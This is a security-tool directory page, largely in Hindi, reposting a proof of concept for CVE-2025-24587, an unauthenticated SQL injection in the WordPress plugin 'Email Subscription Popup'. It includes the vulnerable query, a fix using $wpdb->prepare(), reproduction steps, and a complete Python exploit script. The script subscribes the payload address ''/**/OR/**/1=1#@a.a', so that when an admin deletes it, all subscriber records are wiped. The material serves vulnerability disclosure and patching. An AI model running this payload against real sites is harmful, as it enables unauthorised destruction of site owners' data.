Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24587 — CVE-2025-24587 का PoC | Kitploit
उपकरण/GitHubGitHub/dottak/cve-2025-24587
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubdottak/cve-2025-24587

CVE-2025-24587

CVE-2025-24587 का PoC

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24587

1️⃣ घटक प्रकार

वर्डप्रेस प्लगइन

2️⃣ घटक विवरण

घटक नाम Email Subscription Popup

असुरक्षित संस्करण <= 1.2.23

घटक स्लग email-subscribe

घटक लिंक https://wordpress.org/plugins/email-subscribe/

3️⃣ OWASP 2017: TOP 10

भेद्यता वर्ग A3: Injection

भेद्यता प्रकार SQL Injection

4️⃣ पूर्वापेक्षा

अप्रमाणित

5️⃣

टूल डाउनलोड करें
भेद्यता विवरण

👉 संक्षिप्त विवरण

एक अनधिकृत उपयोगकर्ता (हमलावर) एक ईमेल पते का उपयोग करके न्यूज़लेटर की सदस्यता लेता है जिसमें SQL Injection पेलोड होता है। बाद में, जब व्यवस्थापक "Subscriber Management" पृष्ठ पर जाता है, दुर्भावनापूर्ण ईमेल पते का चयन करता है, और हटाने का अनुरोध करता है, तो ईमेल पते में एम्बेडेड SQL Injection पेलोड निष्पादित हो जाता है। परिणामस्वरूप, डेटाबेस से सभी सदस्यता प्राप्त ईमेल पते हटा दिए जाते हैं।

👉 कैसे पुनरुत्पादित करें (PoC)

  1. एक WordPress साइट तैयार करें जिसमें "Email Subscription Popup" प्लगइन (संस्करण ≤ 1.2.23) सक्रिय हो।
  2. poc.py.txt फ़ाइल (संलग्न) को Python का उपयोग करके चलाएँ ताकि एक ईमेल पते के साथ न्यूज़लेटर की सदस्यता ली जा सके जिसमें SQL Injection भेद्यता को ट्रिगर करने वाला पेलोड हो:
    • ईमेल पता: '/**/OR/**/1=1#@a.a
    • नोट: क्लाइंट (ब्राउज़र) के माध्यम से इस ईमेल पते का उपयोग करके सदस्यता लेना सत्यापन के कारण संभव नहीं है। इसके बजाय, poc.py.txt में दिखाए अनुसार सीधे HTTP अनुरोध पैकेट भेजें।
  3. एक व्यवस्थापक के रूप में लॉग इन करें और निम्न पर जाएँ: http://localhost:8080/wp-admin/admin.php?page=email_subscription_popup_subscribers_management।
  4. ईमेल पते '/****/**OR**/****/1=1#@a.a का चयन करें और नीचे "Delete Selected Subscribers" बटन पर क्लिक करें।
  5. परिणामस्वरूप, सभी सदस्यता प्राप्त ईमेल पते हटा दिए जाएँगे।

👉 अतिरिक्त जानकारी (वैकल्पिक)

[भेद्यता का कारण]

यह भेद्यता फ़ाइल wp-content/plugins/email-subscribe/wp-email-subscription.php में, विशेष रूप से पंक्ति 2080 और 2084 के बीच होती है:

root@kitploit:~
# wp-content/plugins/email-subscribe/wp-email-subscription.php 의 
# line 2083 ~ line 2084
$query = "delete from  " . $wpdb->prefix . "nl_subscriptions where email='$em'";
$wpdb->query($query);

इस समस्या को हल करने के लिए, आप WordPress द्वारा प्रदान किए गए $wpdb->prepare() का उपयोग कर सकते हैं। यह फ़ंक्शन SQL इंजेक्शन हमलों को रोकने के लिए SQL क्वेरी में उपयोग किए जाने वाले चरों को सुरक्षित रूप से एस्केप और फ़ॉर्मेट करता है।

root@kitploit:~
$query = $wpdb->prepare(
    "DELETE FROM " . $wpdb->prefix . "nl_subscriptions WHERE email = %s",
    $em
);
$wpdb->query($query);

⭐ PoC Code

root@kitploit:~
import re
import string
import random
import requests

TARGET = "http://localhost:8080"

def poc():

    ####
    # 1. Retrieve the value of 'sec_string' required for email subscription
    ####
    resp = requests.get(f"{TARGET}")
    pattern = r'var nonce = \'(.{10})\';'
    match = re.search(pattern, resp.text)
    if match:
        sec_string = match.group(1)
        print("[*] sec_string: " + sec_string)
    
        ####
        # 2. Generate subscribers with random email addresses
        ####
        random_string = ''.join(random.choices(string.ascii_letters + string.digits, k=6))
        for i in range(10):
            data = {
                "action": "store_email",
                "email": f"{random_string}_{i}@example.com",
                "name": f"{random_string}_{i}",
                "is_agreed": "true",
                "sec_string": sec_string
            }
            print("[+] Successfully created subscriber #" + str(i) + " Email: " + data['email'] + ", Name: " + data['name'])
            requests.post(f"{TARGET}/wp-admin/admin-ajax.php", data=data)
        
        ####
        # 3. Create a malicious email address to delete all subscriptions
        ####
        data = {
            "action": "store_email",
            "email": "'/**/OR/**/1=1#@a.a",
            "name": "Email mine",
            "is_agreed": "true",
            "sec_string": sec_string
        }
        print("[+] Malicious email address created Email: " + data['email'] + ", Name: " + data['name'])
        requests.post(f"{TARGET}/wp-admin/admin-ajax.php", data=data)
    else:
        print("[-] 'sec_string' not found")
    

if __name__ == "__main__":
    poc()

6️⃣ शोषण प्रदर्शन

video

7️⃣ संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2025-24587